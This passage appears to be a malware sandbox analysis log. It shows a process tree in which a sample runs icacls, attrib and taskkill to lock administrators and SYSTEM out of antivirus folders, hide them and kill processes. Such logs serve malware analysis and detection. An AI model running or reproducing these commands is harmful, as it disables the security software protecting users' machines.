                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2176
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2652
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:988
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2624
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2180
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2944
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2660
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:884
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2392
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:912
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1604
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:900
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1504
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1188
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2892
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:376
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2352
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1680
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:400
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2852
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2628
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2164
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2156
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2712
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2620
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c C:\programdata\microsoft\temp\H.bat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c C:\programdata\microsoft\temp\Temp.bat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      TIMEOUT /T 5 /NOBREAK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      TIMEOUT /T 3 /NOBREAK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      TASKKILL /IM 1.exe /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      TASKKILL /IM P.exe /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ATTRIB +H +S C:\Programdata\Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        TASKKILL /IM iediagcmd.exe /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ATTRIB +H +S "C:\Program Files\360\Total Security"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S C:\ProgramData\360TotalSecurity
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S C:\ProgramData\360safe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S C:\ProgramData\Avira
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S "C:\ProgramData\Package Cache"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S "C:\Program Files\ESET"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S C:\ProgramData\ESET
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ATTRIB +H +S "C:\Programdata\AVAST Software"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATTRIB +H +S "C:\AdwCleaner"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
